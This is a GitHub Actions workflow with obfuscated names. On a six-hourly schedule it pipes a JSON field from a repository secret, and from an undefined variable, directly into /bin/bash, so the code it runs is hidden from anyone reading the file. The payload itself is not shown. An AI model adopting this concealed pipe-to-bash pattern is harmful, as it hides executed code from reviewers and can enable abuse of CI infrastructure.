name: huangjiao2315

on:
  workflow_dispatch:
  schedule:
    - cron: '29 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huangjiao2315
        env:
          ijd06: ${{ secrets.ijd06 }}
        run: |
          echo $ijd06 | jq -r .g04 | /bin/bash
          echo $gyu7663 | jq -r .u7480 | /bin/bash

